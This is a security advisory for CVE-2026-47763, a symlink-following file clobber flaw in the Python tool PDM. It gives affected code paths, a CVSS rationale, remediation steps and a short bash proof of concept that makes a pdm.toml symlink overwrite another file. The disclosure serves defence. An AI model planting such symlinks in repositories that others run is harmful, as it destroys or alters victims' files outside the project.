PT-2026-48600 · Pypi · Pdm
Published
2026-06-10
·
Updated
2026-06-10
·
CVE-2026-47763
CVSS v4.0
6.8
Medium
| Vector | AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N |
Summary
PDM writes several project-local state or configuration files without symlink protection. If a malicious repository places those files as symlinks, local PDM operations can overwrite the symlink targets.
This creates an arbitrary file clobber primitive relative to the privileges of the invoking user.
Affected Behavior
- Project-local config writes can affect files outside the repository
- The most stable demonstrated sink is
pdm.toml - Related sinks include
.pdm-pythonand.python-version
Affected Code
src/pdm/project/config.py:303-350src/pdm/project/core.py:209-217src/pdm/cli/commands/use.py:187-189
Technical Details
Config. init () resolves the project-local pdm.toml path and save config() writes to the resolved target. If PROJECT ROOT/pdm.toml is a symlink to another file, pdm config -l ... updates the target file instead of refusing the write.The same general problem exists for other project-local persistence paths that are written directly with no
lstat / O NOFOLLOW protection.For the
pdm.toml PoC specifically, the target file must already contain parseable TOML. Otherwise the load step fails before the write path is reached. That parser constraint does not apply to the .pdm-python or .python-version sinks.Impact
- Arbitrary file clobber as the invoking user
- Destructive modification of local files outside the repository root
- Useful primitive for privilege abuse when
pdmis run in elevated contexts
Reproduction
PoC:
# Replace this with a Python interpreter that can run `python -m pdm`.
PDM PY=/path/to/python-with-pdm
tmpdir=$(mktemp -d)
target="$tmpdir/clobbered-target.toml"
cat > "$target" <<'EOF'
[seed]
value = 1
EOF
ln -s "$target" "$tmpdir/pdm.toml"
cat > "$tmpdir/pyproject.toml" <<'EOF'
[project]
name = "symlink-clobber-demo"
version = "0.0.1"
EOF
(
cd "$tmpdir" &&
"$PDM PY" -m pdm config -l venv.in project false
)
cat "$target"Expected result:
- A temporary project is created
pdm.tomlis a symlink to another TOML file- Running
pdm config -l venv.in project falsemodifies the symlink target
Observed output from local validation:
--- target ---
[seed]
value = 1
[venv]
in project = falseSeverity
Medium
CVSS v4.0
- Base score:
6.8(Medium) - Vector:
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N
Rationale:
AV:L: exploitation requires local execution ofpdmagainst an attacker-prepared checkoutAC:L: there is no complex constraint once the symlink sink existsAT:N: no extra prerequisite beyond the victim running the relevant command is requiredPR:N: the attacker does not need prior privileges on the victim systemUI:A: the victim must actively run a command that writes project-local state or configVC:N: the demonstrated issue is a write primitive, not a direct read primitiveVI:H: the attacker can cause unauthorized modification of files outside the repository rootVA:L: file clobber can disrupt local operation, but direct same-step availability impact is lower than a full RCESC:N/SI:N/SA:N: the base score is limited to the directly affected system
Root Cause
Project-local file sinks are treated as trusted regular files and are written without symlink checks or guarded atomic replacement.
Recommended Remediation
- Refuse to write project-local config/state files when the destination is a symlink
- Use
lstatandO NOFOLLOWwhere available - Avoid resolving attacker-controlled project-local paths before writing
- Use atomic temp-file replacement only after confirming the destination is a regular file
Disclosure Notes
This issue is independent from the code-execution issues above. It is best tracked as a separate CVE candidate because the root cause and remediation are different.
Fix
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Pdm